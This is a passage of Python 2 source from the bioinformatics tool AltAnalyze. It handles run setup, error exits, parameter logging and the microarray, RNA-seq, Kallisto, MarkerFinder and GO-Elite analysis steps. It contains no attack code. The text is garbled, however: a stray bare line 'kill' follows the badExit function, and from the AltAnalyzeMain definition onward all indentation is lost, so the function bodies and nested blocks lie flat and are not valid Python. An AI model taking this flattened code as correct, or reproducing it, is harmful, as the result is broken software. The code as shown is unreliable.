    """
    global apt_location; global root_dir;global log_file; global summary_data_db; summary_data_db={}; reload(UI)
    global probability_statistic; global commandLineMode; commandLineMode = 'no'
    if 'remoteViewer' == skip_intro:
        # Start the viewer app instead of an analysis run.
        if os.name == 'nt':
            callWXPython()
        elif os.name == 'ntX':
            # NOTE(review): 'ntX' is never a real os.name — this branch looks
            # intentionally disabled.
            package_path = filepath('python')
            win_package_path = string.replace(package_path,'python','AltAnalyzeViewer.exe')
            import subprocess
            subprocess.call([win_package_path]);sys.exit()
        elif os.name == 'posix':
            # Launch the bundled viewer binary as a separate process.
            package_path = filepath('python')
            #mac_package_path = string.replace(package_path,'python','AltAnalyze.app/Contents/MacOS/python')
            #os.system(mac_package_path+' RemoteViewer.py');sys.exit()
            mac_package_path = string.replace(package_path,'python','AltAnalyzeViewer.app/Contents/MacOS/AltAnalyzeViewer')
            import subprocess
            subprocess.call([mac_package_path]);sys.exit()
        """
        import threading
        import wx
        app = wx.PySimpleApp()
        t = threading.Thread(target=callWXPython)
        t.setDaemon(1)
        t.start()
        s = 1
        queue = mlp.Queue()
        proc = mlp.Process(target=callWXPython) ### passing sys.stdout unfortunately doesn't work to pass the Tk string
        proc.start()
        sys.exit()
        """
    reload(UI)
    # Gather all run parameters from the (possibly interactive) UI.
    expr_var, alt_var, additional_var, goelite_var, exp_file_location_db = UI.getUserParameters(skip_intro,Multi=mlp)
    """except Exception:
        if 'SystemExit' not in str(traceback.format_exc()):
            expr_var, alt_var, additional_var, goelite_var, exp_file_location_db = UI.getUserParameters('yes')
        else: sys.exit()"""
    # Cache per-dataset locations/statistic choice into module globals.
    for dataset in exp_file_location_db:
        fl = exp_file_location_db[dataset]
        apt_location = fl.APTLocation()
        root_dir = fl.RootDir()
        try: probability_statistic = fl.ProbabilityStatistic()
        except Exception: probability_statistic = 'unpaired t-test'
    # Create (truncate) the timestamped log file for this run.
    time_stamp = timestamp()
    log_file = filepath(root_dir+'AltAnalyze_report-'+time_stamp+'.log')
    log_report = open(log_file,'w'); log_report.close()
    if use_Tkinter == 'yes' and debug_mode == 'no':
        # GUI mode: run the analysis behind a Tk status window.
        try:
            global root; root = Tk()
            StatusWindow(root,expr_var, alt_var, goelite_var, additional_var, exp_file_location_db)
            root.destroy()
        except Exception, exception:
            try:
                print traceback.format_exc()
                badExit()
            except Exception: sys.exit()
    else: AltAnalyzeMain(expr_var, alt_var, goelite_var, additional_var, exp_file_location_db,'')
def badExit():
    """Report an unrecoverable error, open/point the user at the log file
    (GUI mode only), and terminate the process."""
    print "\n...exiting AltAnalyze due to unexpected error"
    try:
        time_stamp = timestamp()
        print_out = "Unknown error encountered during data processing.\nPlease see logfile in:\n\n"+log_file+"\nand report to altanalyze@gmail.com."
        try:
            if len(log_file)>0:
                if commandLineMode == 'no':
                    # Open the log in the platform's default viewer.
                    if os.name == 'nt':
                        try: os.startfile('"'+log_file+'"')
                        except Exception: os.system('open "'+log_file+'"')
                    elif 'darwin' in sys.platform: os.system('open "'+log_file+'"')
                    elif 'linux' in sys.platform: os.system('xdg-open "'+log_file+'"')
                if commandLineMode == 'no':
                    # Show a warning dialog; fall back to stdout if Tk is gone.
                    try: UI.WarningWindow(print_out,'Error Encountered!'); root.destroy()
                    except Exception: print print_out
        except Exception: sys.exit()
    except Exception: sys.exit()
    sys.exit()
kill
def AltAnalyzeMain(expr_var,alt_var,goelite_var,additional_var,exp_file_location_db,root):
### Hard-coded defaults
w = 'Agilent'; x = 'Affymetrix'; y = 'Ensembl'; z = 'any'; data_source = y; constitutive_source = z; manufacturer = x ### Constitutive source, is only really paid attention to if Ensembl, otherwise Affymetrix is used (even if default)
### Get default options for ExpressionBuilder and AltAnalyze
start_time = time.time()
test_goelite = 'no'; test_results_pannel = 'no'
global species; global array_type; global expression_data_format; global use_R; use_R = 'no'
global analysis_method; global p_threshold; global filter_probeset_types
global permute_p_threshold; global perform_permutation_analysis; global export_NI_values
global run_MiDAS; global analyze_functional_attributes; global microRNA_prediction_method
global calculate_normIntensity_p; global pathway_permutations; global avg_all_for_ss; global analyze_all_conditions
global remove_intronic_junctions
global agglomerate_inclusion_probesets; global expression_threshold; global factor_out_expression_changes
global only_include_constitutive_containing_genes; global remove_transcriptional_regulated_genes; global add_exons_to_annotations
global exclude_protein_details; global filter_for_AS; global use_direct_domain_alignments_only; global run_from_scratch
global explicit_data_type; explicit_data_type = 'null'
global altanalyze_files; altanalyze_files = []
species,array_type,manufacturer,constitutive_source,dabg_p,raw_expression_threshold,avg_all_for_ss,expression_data_format,include_raw_data, run_from_scratch, perform_alt_analysis = expr_var
analysis_method,p_threshold,filter_probeset_types,alt_exon_fold_variable,gene_expression_cutoff,remove_intronic_junctions,permute_p_threshold,perform_permutation_analysis, export_NI_values, analyze_all_conditions = alt_var
calculate_normIntensity_p, run_MiDAS, use_direct_domain_alignments_only, microRNA_prediction_method, filter_for_AS, additional_algorithms = additional_var
ge_fold_cutoffs,ge_pvalue_cutoffs,ge_ptype,filter_method,z_threshold,p_val_threshold,change_threshold,resources_to_analyze,pathway_permutations,mod,returnPathways = goelite_var
original_remove_intronic_junctions = remove_intronic_junctions
if run_from_scratch == 'Annotate External Results': analysis_method = 'external'
if returnPathways == 'no' or returnPathways == 'None':
returnPathways = None
for dataset in exp_file_location_db:
fl = exp_file_location_db[dataset]
try: exon_exp_threshold = fl.ExonExpThreshold()
except Exception: exon_exp_threshold = 'NA'
try: gene_exp_threshold = fl.GeneExpThreshold()
except Exception: gene_exp_threshold = 'NA'
try: exon_rpkm_threshold = fl.ExonRPKMThreshold()
except Exception: exon_rpkm_threshold = 'NA'
try: rpkm_threshold = fl.RPKMThreshold() ### Gene-Level
except Exception: rpkm_threshold = 'NA'
fl.setJunctionExpThreshold(raw_expression_threshold) ### For RNA-Seq, this specifically applies to exon-junctions
try: predictGroups = fl.predictGroups()
except Exception: predictGroups = False
try:
if fl.excludeLowExpressionExons(): excludeLowExpExons = 'yes'
else: excludeLowExpExons = 'no'
except Exception: excludeLowExpExons = 'no'
if test_goelite == 'yes': ### It can be difficult to get error warnings from GO-Elite, unless run here
results_dir = filepath(fl.RootDir())
elite_input_dirs = ['AltExonConfirmed','AltExon','regulated','upregulated','downregulated'] ### Run GO-Elite multiple times to ensure heatmaps are useful and to better organize results
for elite_dir in elite_input_dirs:
file_dirs = results_dir+'GO-Elite/'+elite_dir,results_dir+'GO-Elite/denominator',results_dir+'GO-Elite/'+elite_dir
variables = species,mod,pathway_permutations,filter_method,z_threshold,p_val_threshold,change_threshold,resources_to_analyze,returnPathways,file_dirs,root
GO_Elite.remoteAnalysis(variables,'non-UI',Multi=mlp)
global perform_element_permutation_analysis; global permutations
perform_element_permutation_analysis = 'yes'; permutations = 2000
analyze_functional_attributes = 'yes' ### Do this by default (shouldn't substantially increase runtime)
if run_from_scratch != 'Annotate External Results' and (array_type != "3'array" and array_type!='RNASeq'):
if run_from_scratch !='Process AltAnalyze filtered':
try: raw_expression_threshold = float(raw_expression_threshold)
except Exception: raw_expression_threshold = 1
if raw_expression_threshold<1:
raw_expression_threshold = 1
print "Expression threshold < 1, forcing to be a minimum of 1."
try: dabg_p = float(dabg_p)
except Exception: dabg_p = 0
if dabg_p == 0 or dabg_p > 1:
print "Invalid dabg-p value threshold entered,(",dabg_p,") setting to default of 0.05"
dabg_p = 0.05
if use_direct_domain_alignments_only == 'direct-alignment': use_direct_domain_alignments_only = 'yes'
if run_from_scratch == 'Process CEL files': expression_data_format = 'log'
print "Beginning AltAnalyze Analysis... Format:", expression_data_format
if array_type == 'RNASeq': id_name = 'exon/junction IDs'
else: id_name = 'array IDs'
print_items=[]; #print [permute_p_threshold]; sys.exit()
if 'array' in array_type:
dataType='Gene Expression'
else:
dataType=array_type
print_items.append("AltAnalyze version 2.1.3 - Expression Analysis Parameters Being Used...")
print_items.append('\t'+'database'+': '+unique.getCurrentGeneDatabaseVersion())
print_items.append('\t'+'species'+': '+species)
print_items.append('\t'+'method'+': '+dataType)
print_items.append('\t'+'manufacturer'+': '+manufacturer)
print_items.append('\t'+'probability_statistic'+': '+probability_statistic)
print_items.append('\t'+'constitutive_source'+': '+constitutive_source)
print_items.append('\t'+'dabg_p'+': '+str(dabg_p))
if array_type == 'RNASeq':
print_items.append('\t'+'junction expression threshold'+': '+str(raw_expression_threshold))
print_items.append('\t'+'exon_exp_threshold'+': '+str(exon_exp_threshold))
print_items.append('\t'+'gene_exp_threshold'+': '+str(gene_exp_threshold))
print_items.append('\t'+'exon_rpkm_threshold'+': '+str(exon_rpkm_threshold))
print_items.append('\t'+'gene_rpkm_threshold'+': '+str(rpkm_threshold))
print_items.append('\t'+'exclude low expressing exons for RPKM'+': '+excludeLowExpExons)
else:
print_items.append('\t'+'raw_expression_threshold'+': '+str(raw_expression_threshold))
print_items.append('\t'+'avg_all_for_ss'+': '+avg_all_for_ss)
print_items.append('\t'+'expression_data_format'+': '+expression_data_format)
print_items.append('\t'+'include_raw_data'+': '+include_raw_data)
print_items.append('\t'+'run_from_scratch'+': '+run_from_scratch)
print_items.append('\t'+'perform_alt_analysis'+': '+perform_alt_analysis)
if avg_all_for_ss == 'yes': cs_type = 'core'
else: cs_type = 'constitutive'
print_items.append('\t'+'calculate_gene_expression_using'+': '+cs_type)
print_items.append("Alternative Exon Analysis Parameters Being Used..." )
print_items.append('\t'+'analysis_method'+': '+analysis_method)
print_items.append('\t'+'p_threshold'+': '+str(p_threshold))
print_items.append('\t'+'filter_data_types'+': '+filter_probeset_types)
print_items.append('\t'+'alt_exon_fold_variable'+': '+str(alt_exon_fold_variable))
print_items.append('\t'+'gene_expression_cutoff'+': '+str(gene_expression_cutoff))
print_items.append('\t'+'remove_intronic_junctions'+': '+remove_intronic_junctions)
print_items.append('\t'+'avg_all_for_ss'+': '+avg_all_for_ss)
print_items.append('\t'+'permute_p_threshold'+': '+str(permute_p_threshold))
print_items.append('\t'+'perform_permutation_analysis'+': '+perform_permutation_analysis)
print_items.append('\t'+'export_NI_values'+': '+export_NI_values)
print_items.append('\t'+'run_MiDAS'+': '+run_MiDAS)
print_items.append('\t'+'use_direct_domain_alignments_only'+': '+use_direct_domain_alignments_only)
print_items.append('\t'+'microRNA_prediction_method'+': '+microRNA_prediction_method)
print_items.append('\t'+'analyze_all_conditions'+': '+analyze_all_conditions)
print_items.append('\t'+'filter_for_AS'+': '+filter_for_AS)
if pathway_permutations == 'NA': run_GOElite = 'decide_later'
else: run_GOElite = 'run-immediately'
print_items.append('\t'+'run_GOElite'+': '+ run_GOElite)
universalPrintFunction(print_items)
if commandLineMode == 'yes': print 'Running command line mode:',commandLineMode
summary_data_db['gene_assayed'] = 0
summary_data_db['denominator_exp_genes']=0
summary_data_db['alt_events'] = 0
summary_data_db['denominator_exp_events'] = 0
summary_data_db['alt_genes'] = 0
summary_data_db['direct_domain_genes'] = 0
summary_data_db['miRNA_gene_denom'] = 0
summary_data_db['miRNA_gene_hits'] = 0
if test_results_pannel == 'yes': ### It can be difficult to get error warnings from GO-Elite, unless run here
graphic_links = []
graphic_links.append(['test','Config/AltAnalyze_structure-RNASeq.jpg'])
summary_data_db['QC']=graphic_links
print_out = 'Analysis complete. AltAnalyze results\nexported to "AltResults/AlternativeOutput".'
dataset = 'test'; results_dir=''
print "Analysis Complete\n";
if root !='' and root !=None:
UI.InfoWindow(print_out,'Analysis Completed!')
tl = Toplevel(); SummaryResultsWindow(tl,'GE',results_dir,dataset,'parent',summary_data_db)
root.destroy(); sys.exit()
global export_go_annotations; global aspire_output_list; global aspire_output_gene_list
global filter_probesets_by; global global_addition_factor; global onlyAnalyzeJunctions
global log_fold_cutoff; global aspire_cutoff; global annotation_system; global alt_exon_logfold_cutoff
"""dabg_p = 0.75; data_type = 'expression' ###used for expression analysis when dealing with AltMouse arrays
a = "3'array"; b = "exon"; c = "AltMouse"; e = "custom"; array_type = c
l = 'log'; n = 'non-log'; expression_data_format = l
hs = 'Hs'; mm = 'Mm'; dr = 'Dr'; rn = 'Rn'; species = mm
include_raw_data = 'yes'; expression_threshold = 70 ### Based on suggestion from BMC Genomics. 2006 Dec 27;7:325. PMID: 17192196, for hu-exon 1.0 st array
avg_all_for_ss = 'no' ###Default is 'no' since we don't want all probes averaged for the exon arrays"""
###### Run ExpressionBuilder ######
"""ExpressionBuilder is used to:
(1) extract out gene expression values, provide gene annotations, and calculate summary gene statistics
(2) filter probesets based DABG p-values and export to pair-wise comparison files
(3) build array annotations files matched to gene structure features (e.g. exons, introns) using chromosomal coordinates
options 1-2 are executed in remoteExpressionBuilder and option 3 is by running ExonArrayEnsembl rules"""
try:
additional_algorithm = additional_algorithms.Algorithm()
additional_score = additional_algorithms.Score()
except Exception: additional_algorithm = 'null'; additional_score = 'null'
if analysis_method == 'FIRMA': analyze_metaprobesets = 'yes'
elif additional_algorithm == 'FIRMA': analyze_metaprobesets = 'yes'
else: analyze_metaprobesets = 'no'
### Check to see if this is a real or FAKE (used for demonstration purposes) dataset
if run_from_scratch == 'Process CEL files' or 'Feature Extraction' in run_from_scratch:
for dataset in exp_file_location_db:
if run_from_scratch == 'Process CEL files':
fl = exp_file_location_db[dataset]
pgf_file=fl.InputCDFFile()
results_dir = filepath(fl.RootDir())
if '_demo' in pgf_file: ### Thus we are running demo CEL files and want to quit immediately
print_out = 'Analysis complete. AltAnalyze results\nexported to "AltResults/AlternativeOutput".'
try:
print "Analysis Complete\n";
if root !='' and root !=None:
UI.InfoWindow(print_out,'Analysis Completed!')
tl = Toplevel(); SummaryResultsWindow(tl,'AS',results_dir,dataset,'parent',summary_data_db)
except Exception: null=[]
skip_intro = 'yes'
if pathway_permutations == 'NA' and run_from_scratch != 'Annotate External Results':
reload(UI)
UI.getUpdatedParameters(array_type,species,run_from_scratch,results_dir)
try: AltAnalyzeSetup('no')
except Exception: sys.exit()
if 'CEL files' in run_from_scratch:
from import_scripts import APT
try:
try:
APT.probesetSummarize(exp_file_location_db,analyze_metaprobesets,filter_probeset_types,species,root)
if analyze_metaprobesets == 'yes':
analyze_metaprobesets = 'no' ### Re-run the APT analysis to obtain probeset rather than gene-level results (only the residuals are needed from a metaprobeset run)
APT.probesetSummarize(exp_file_location_db,analyze_metaprobesets,filter_probeset_types,species,root)
except Exception:
import platform
print "Trying to change APT binary access privileges"
for dataset in exp_file_location_db: ### Instance of the Class ExpressionFileLocationData
fl = exp_file_location_db[dataset]; apt_dir =fl.APTLocation()
if '/bin' in apt_dir: apt_file = apt_dir +'/apt-probeset-summarize' ### if the user selects an APT directory
elif os.name == 'nt': apt_file = apt_dir + '/PC/'+platform.architecture()[0]+'/apt-probeset-summarize.exe'
elif 'darwin' in sys.platform: apt_file = apt_dir + '/Mac/apt-probeset-summarize'
elif 'linux' in sys.platform:
if '32bit' in platform.architecture(): apt_file = apt_dir + '/Linux/32bit/apt-probeset-summarize'
elif '64bit' in platform.architecture(): apt_file = apt_dir + '/Linux/64bit/apt-probeset-summarize'
apt_file = filepath(apt_file)
os.chmod(apt_file,0777)
midas_dir = string.replace(apt_file,'apt-probeset-summarize','apt-midas')
os.chmod(midas_dir,0777)
APT.probesetSummarize(exp_file_location_db,analysis_method,filter_probeset_types,species,root)
except Exception:
print_out = 'AltAnalyze encountered an un-expected error while running Affymetrix\n'
print_out += 'Power Tools (APT). Additional information may be found in the directory\n'
print_out += '"ExpressionInput/APT" in the output directory. You may also encounter issues\n'
print_out += 'if you are logged into an account with restricted priveledges.\n\n'
print_out += 'If this issue can not be resolved, contact AltAnalyze help or run RMA outside\n'
print_out += 'of AltAnalyze and import the results using the analysis option "expression file".\n'
print traceback.format_exc()
try:
UI.WarningWindow(print_out,'Exit')
root.destroy(); sys.exit()
except Exception:
print print_out; sys.exit()
elif 'Feature Extraction' in run_from_scratch:
from import_scripts import ProcessAgilentArrays
try: ProcessAgilentArrays.agilentSummarize(exp_file_location_db)
except Exception:
print_out = 'Agilent array import and processing failed... see error log for details...'
print traceback.format_exc()
try:
UI.WarningWindow(print_out,'Exit')
root.destroy(); sys.exit()
except Exception:
print print_out; sys.exit()
reload(ProcessAgilentArrays)
if run_from_scratch == 'Process RNA-seq reads' or run_from_scratch == 'buildExonExportFiles':
import RNASeq; reload(RNASeq); import RNASeq
for dataset in exp_file_location_db: fl = exp_file_location_db[dataset]
### The below function aligns splice-junction coordinates to Ensembl exons from BED Files and
### exports AltAnalyze specific databases that are unique to this dataset to the output directory
try: fastq_folder = fl.RunKallisto()
except Exception: print traceback.format_exc()
try: customFASTA = fl.CustomFASTA()
except Exception: customFASTA = None
processBEDfiles = True
if len(fastq_folder)>0:
### Perform pseudoalignment with Kallisto on FASTQ files
processBEDfiles=False
try:
RNASeq.runKallisto(species,dataset,root_dir,fastq_folder,mlp,returnSampleNames=False,customFASTA=customFASTA)
biotypes = 'ran'
dir_list = unique.read_directory(root_dir)
### If we are performing a splicing analysis
if perform_alt_analysis != 'no' and perform_alt_analysis != 'expression':
print '...Performing analyses on junction-RPKM versus Kallisto-TPM.'
for file in dir_list:
if '.bam' in string.lower(file):
processBEDfiles=True
if '.bed' in string.lower(file):
processBEDfiles=True
try: rpkm_threshold = fl.RPKMThreshold()
except Exception: rpkm_threshold = []
if isinstance(rpkm_threshold, int) ==False:
array_type = 'RNASeq'
fl.setArrayType(array_type)
fl.setBEDFileDir(root_dir)
fl.setRPKMThreshold(1.0)
fl.setExonExpThreshold(5.0)
fl.setGeneExpThreshold(200.0)
fl.setExonRPKMThreshold(0.5)
fl.setJunctionExpThreshold(5.0)
fl.setVendor('RNASeq')
### Export BAM file indexes
try:
from import_scripts import BAMtoJunctionBED
try: BAMtoJunctionBED.exportIndexes(root_dir)
except:
print 'BAM file indexing failed...'
print traceback.format_exc()
except: print 'BAM file support missing due to lack of pysam...'
else:
print '...Performing analyses on Kallisto-TPM values directly.'
array_type = "3'array"
fl.setArrayType(array_type)
vendor = 'other:Ensembl' ### Ensembl linked system name
fl.setVendor(vendor)
except Exception:
print traceback.format_exc()
biotypes='failed'
if processBEDfiles:
analyzeBAMs = False; bedFilesPresent = False
dir_list = unique.read_directory(fl.BEDFileDir())
for file in dir_list:
if '.bam' in string.lower(file):
analyzeBAMs=True
if '.bed' in string.lower(file):
bedFilesPresent=True
if analyzeBAMs and bedFilesPresent==False:
from import_scripts import multiBAMtoBED
bam_dir = fl.BEDFileDir()
refExonCoordinateFile = filepath('AltDatabase/ensembl/'+species+'/'+species+'_Ensembl_exon.txt')
outputExonCoordinateRefBEDfile = bam_dir+'/BedRef/'+species+'_'+string.replace(dataset,'exp.','')
analysisType = ['exon','junction','reference']
#analysisType = ['junction']
#print [fl.multiThreading()]
multiBAMtoBED.parallelBAMProcessing(bam_dir,refExonCoordinateFile,outputExonCoordinateRefBEDfile,analysisType=analysisType,useMultiProcessing=fl.multiThreading(),MLP=mlp,root=root)
biotypes = RNASeq.alignExonsAndJunctionsToEnsembl(species,exp_file_location_db,dataset,Multi=mlp)
if biotypes == 'failed':
print_out = 'No valid chromosomal positions in the input BED or BioScope files. Exiting AltAnalyze.'
if len(fastq_folder)>0:
if 'FTP' in traceback.format_exc():
print_out = 'AltAnlayze was unable to retreive a transcript fasta sequence file from the Ensembl website. '
print_out += 'Ensure you are connected to the internet and that the website http://ensembl.org is live.'
else:
print_out = 'An unexplained error was encountered with Kallisto analysis:\n'
print_out += traceback.format_exc()
try:
UI.WarningWindow(print_out,'Exit')
root.destroy(); sys.exit()
except Exception:
print print_out; sys.exit()
reload(RNASeq)
if root_dir in biotypes:
print_out = 'Exon-level BED coordinate predictions exported to:\n'+biotypes
print_out+= '\n\nAfter obtaining exon expression estimates, rename exon BED files to\n'
print_out+= 'match the junction name (e.g., Sample1__exon.bed and Sample1__junction.bed)\n'
print_out+= 'and re-run AltAnalyze (see tutorials at http://altanalyze.org for help).'
UI.InfoWindow(print_out,'Export Complete')
try: root.destroy(); sys.exit()
except Exception: sys.exit()
if predictGroups == True:
expFile = fl.ExpFile()
if array_type == 'RNASeq':
exp_threshold=100; rpkm_threshold=10
else:
exp_threshold=200; rpkm_threshold=8
RNASeq.singleCellRNASeqWorkflow(species, array_type, expFile, mlp, exp_threshold=exp_threshold, rpkm_threshold=rpkm_threshold)
goelite_run = False
if run_from_scratch == 'Process Expression file' or run_from_scratch == 'Process CEL files' or run_from_scratch == 'Process RNA-seq reads' or 'Feature Extraction' in run_from_scratch:
if (fl.NormMatrix()=='quantile' or fl.NormMatrix()=='group') and 'Feature Extraction' not in run_from_scratch:
from stats_scripts import NormalizeDataset
try: NormalizeDataset.normalizeDataset(fl.ExpFile(),normalization=fl.NormMatrix(),platform=array_type)
except Exception: print "Normalization failed for unknown reasons..."
#"""
status = ExpressionBuilder.remoteExpressionBuilder(species,array_type,
dabg_p,raw_expression_threshold,avg_all_for_ss,expression_data_format,
manufacturer,constitutive_source,data_source,include_raw_data,
perform_alt_analysis,ge_fold_cutoffs,ge_pvalue_cutoffs,ge_ptype,
exp_file_location_db,root)
reload(ExpressionBuilder) ### Clears Memory
#"""
graphics=[]
if fl.MarkerFinder() == 'yes':
### Identify putative condition-specific marker genees
import markerFinder
fl.setOutputDir(root_dir) ### This needs to be set here
exp_file = fl.ExpFile()
if array_type != "3'array": exp_file = string.replace(exp_file,'.txt','-steady-state.txt')
try:
exp_file = fl.KallistoFile() ### Override with the Kallisto expression file if present
print 'Using the Kallisto expressio file for MarkerFinder...'
except: pass
markerFinder_inputs = [exp_file,fl.DatasetFile()] ### Output a replicate and non-replicate version
markerFinder_inputs = [exp_file] ### Only considers the replicate and not mean analysis (recommended)
for input_exp_file in markerFinder_inputs:
### This applies to an ExpressionOutput DATASET file compoosed of gene expression values (averages already present)
try:
output_dir = markerFinder.getAverageExpressionValues(input_exp_file,array_type) ### Either way, make an average annotated file from the DATASET file
except Exception:
print "Unknown MarkerFinder failure (possible filename issue or data incompatibility)..."
print traceback.format_exc()
continue
if 'DATASET' in input_exp_file:
group_exp_file = string.replace(input_exp_file,'DATASET','AVERAGE')
else:
group_exp_file = (input_exp_file,output_dir) ### still analyze the primary sample
compendiumType = 'protein_coding'
if expression_data_format == 'non-log': logTransform = True
else: logTransform = False
try: markerFinder.analyzeData(group_exp_file,species,array_type,compendiumType,AdditionalParameters=fl,logTransform=logTransform)
except Exception: None
### Generate heatmaps (unclustered - order by markerFinder)
try: graphics = markerFinder.generateMarkerHeatMaps(fl,array_type,graphics=graphics,Species=species)
except Exception: print traceback.format_exc()
remove_intronic_junctions = original_remove_intronic_junctions ### This var gets reset when running FilterDABG
try:
summary_data_db['QC'] = fl.GraphicLinks()+graphics ### provides links for displaying QC and clustering plots
except Exception:
null=[] ### Visualization support through matplotlib either not present or visualization options excluded
#print '!!!!!finished expression builder'
#returnLargeGlobalVars()
expression_data_format = 'log' ### This variable is set from non-log in FilterDABG when present (version 1.16)
try:
parent_dir = fl.RootDir()+'/GO-Elite/regulated/'
dir_list = read_directory(parent_dir)
for file in dir_list:
input_file_dir = parent_dir+'/'+file
inputType = 'IDs'
interactionDirs = ['WikiPathways','KEGG','BioGRID','TFTargets']
output_dir = parent_dir
degrees = 'direct'
input_exp_file = input_file_dir
gsp = UI.GeneSelectionParameters(species,array_type,manufacturer)
gsp.setGeneSet('None Selected')
gsp.setPathwaySelect('')
gsp.setGeneSelection('')
gsp.setOntologyID('')
gsp.setIncludeExpIDs(True)
UI.networkBuilder(input_file_dir,inputType,output_dir,interactionDirs,degrees,input_exp_file,gsp,'')
except Exception:
#print traceback.format_exc()
pass
if status == 'stop':
### See if the array and species are compatible with GO-Elite analysis
system_codes = UI.getSystemInfo()
go_elite_analysis_supported = 'yes'
species_names = UI.getSpeciesInfo()
for dataset in exp_file_location_db:
fl = exp_file_location_db[dataset]; results_dir = filepath(fl.RootDir())
### Perform GO-Elite Analysis
if pathway_permutations != 'NA':
try:
print '\nBeginning to run GO-Elite analysis on alternative exon results'
elite_input_dirs = ['AltExonConfirmed','AltExon','regulated','upregulated','downregulated'] ### Run GO-Elite multiple times to ensure heatmaps are useful and to better organize results
for elite_dir in elite_input_dirs:
file_dirs = results_dir+'GO-Elite/'+elite_dir,results_dir+'GO-Elite/denominator',results_dir+'GO-Elite/'+elite_dir
input_dir = results_dir+'GO-Elite/'+elite_dir
variables = species,mod,pathway_permutations,filter_method,z_threshold,p_val_threshold,change_threshold,resources_to_analyze,returnPathways,file_dirs,root
try: input_files = read_directory(input_dir) ### Are there any files to analyze?
except Exception: input_files=[]
if len(input_files)>0:
try: GO_Elite.remoteAnalysis(variables,'non-UI',Multi=mlp); goelite_run = True
except Exception,e:
print e
print "GO-Elite analysis failed"
try: GO_Elite.moveMAPPFinderFiles(file_dirs[0])
except Exception: print 'Input GO-Elite files could NOT be moved.'
try: GO_Elite.moveMAPPFinderFiles(file_dirs[1])
except Exception: print 'Input GO-Elite files could NOT be moved.'
except Exception: pass
if goelite_run == False:
print 'No GO-Elite input files to analyze (check your criterion).'
print_out = 'Analysis complete. Gene expression\nsummary exported to "ExpressionOutput".'
try:
if use_Tkinter == 'yes':
print "Analysis Complete\n"; UI.InfoWindow(print_out,'Analysis Completed!')
tl = Toplevel(); SummaryResultsWindow(tl,'GE',results_dir,dataset,'parent',summary_data_db)
if pathway_permutations == 'NA' and run_from_scratch != 'Annotate External Results':
if go_elite_analysis_supported == 'yes':
UI.getUpdatedParameters(array_type,species,run_from_scratch,file_dirs)
try: AltAnalyzeSetup('no')
except Exception:
print traceback.format_exc()
sys.exit()
else: print '\n'+print_out; sys.exit()
except Exception:
#print 'Failed to report status through GUI.'
sys.exit()
else: altanalyze_files = status[1] ### These files are the comparison files to analyze
elif run_from_scratch == 'update DBs':
null=[] ###Add link to new module here (possibly)
#updateDBs(species,array_type)
sys.exit()
if perform_alt_analysis != 'expression': ###Thus perform_alt_analysis = 'both' or 'alt' (default when skipping expression summary step)
###### Run AltAnalyze ######
global dataset_name; global summary_results_db; global summary_results_db2
summary_results_db={}; summary_results_db2={}; aspire_output_list=[]; aspire_output_gene_list=[]
onlyAnalyzeJunctions = 'no'; agglomerate_inclusion_probesets = 'no'; filter_probesets_by = 'NA'
if array_type == 'AltMouse' or ((array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null'):
if filter_probeset_types == 'junctions-only': onlyAnalyzeJunctions = 'yes'
elif filter_probeset_types == 'combined-junctions': agglomerate_inclusion_probesets = 'yes'; onlyAnalyzeJunctions = 'yes'
elif filter_probeset_types == 'exons-only': analysis_method = 'splicing-index'; filter_probesets_by = 'exon'
if filter_probeset_types == 'combined-junctions' and array_type == 'junction' or array_type == 'RNASeq': filter_probesets_by = 'all'
else: filter_probesets_by = filter_probeset_types
c = 'Ensembl'; d = 'Entrez Gene'
annotation_system = c
expression_threshold = 0 ###This is different than the raw_expression_threshold (probably shouldn't filter so set to 0)
if analysis_method == 'linearregres-rlm': analysis_method = 'linearregres';use_R = 'yes'
if gene_expression_cutoff<1:
gene_expression_cutoff = 2 ### A number less than one is invalid
print "WARNING!!!! Invalid gene expression fold cutoff entered,\nusing the default value of 2, must be greater than 1."
log_fold_cutoff = math.log(float(gene_expression_cutoff),2)
if analysis_method != 'ASPIRE' and analysis_method != 'none' and analysis_method != 'MultiPath-PSI':
if p_threshold <= 0 or p_threshold >1:
p_threshold = 0.05 ### A number less than one is invalid
print "WARNING!!!! Invalid alternative exon p-value threshold entered,\nusing the default value of 0.05."
if alt_exon_fold_variable<1:
alt_exon_fold_variable = 1 ### A number less than one is invalid
print "WARNING!!!! Invalid alternative exon fold cutoff entered,\nusing the default value of 2, must be greater than 1."
try: alt_exon_logfold_cutoff = math.log(float(alt_exon_fold_variable),2)
except Exception: alt_exon_logfold_cutoff = 1
else: alt_exon_logfold_cutoff = float(alt_exon_fold_variable)
global_addition_factor = 0
export_junction_comparisons = 'no' ### No longer accessed in this module - only in update mode through a different module
factor_out_expression_changes = 'yes' ### Use 'no' if data is normalized already or no expression normalization for ASPIRE desired
only_include_constitutive_containing_genes = 'yes'
remove_transcriptional_regulated_genes = 'yes'
add_exons_to_annotations = 'no'
exclude_protein_details = 'no'
if analysis_method == 'ASPIRE' or 'linearregres' in analysis_method: annotation_system = d
if 'linear' in analysis_method: analysis_method = 'linearregres'
if 'aspire' in analysis_method: analysis_method = 'ASPIRE'
if array_type == 'AltMouse': species = 'Mm'
#if export_NI_values == 'yes': remove_transcriptional_regulated_genes = 'no'
###Saves run-time while testing the software (global variable stored)
#import_dir = '/AltDatabase/affymetrix/'+species
#dir_list = read_directory(import_dir) #send a sub_directory to a function to identify all files in a directory
### Get Ensembl-GO and pathway annotations from GO-Elite files
universalPrintFunction(["Importing GO-Elite pathway/GO annotations"])
global go_annotations; go_annotations={}
from import_scripts import BuildAffymetrixAssociations
go_annotations = BuildAffymetrixAssociations.getEnsemblAnnotationsFromGOElite(species)
global probeset_annotations_file
if array_type == 'RNASeq': probeset_annotations_file = root_dir+'AltDatabase/'+species+'/'+array_type+'/'+species+'_Ensembl_junctions.txt'
elif array_type == 'AltMouse': probeset_annotations_file = 'AltDatabase/'+species+'/'+array_type+'/'+'MASTER-probeset-transcript.txt'
else: probeset_annotations_file = 'AltDatabase/'+species+'/'+array_type+'/'+species+'_Ensembl_probesets.txt'
#"""
if analysis_method != 'none' and analysis_method != 'MultiPath-PSI':
analysis_summary = RunAltAnalyze() ### Only run if analysis methods is specified (only available for RNA-Seq and junction analyses)
else: analysis_summary = None
if analysis_summary != None:
summary_results_db, aspire_output_gene_list, number_events_analyzed = analysis_summary
summary_data_db2 = copy.deepcopy(summary_data_db)
for i in summary_data_db2: del summary_data_db[i] ### If we reset the variable it violates it's global declaration... do this instead
#universalPrintFunction(['Alternative Exon Results for Junction Comparisons:'])
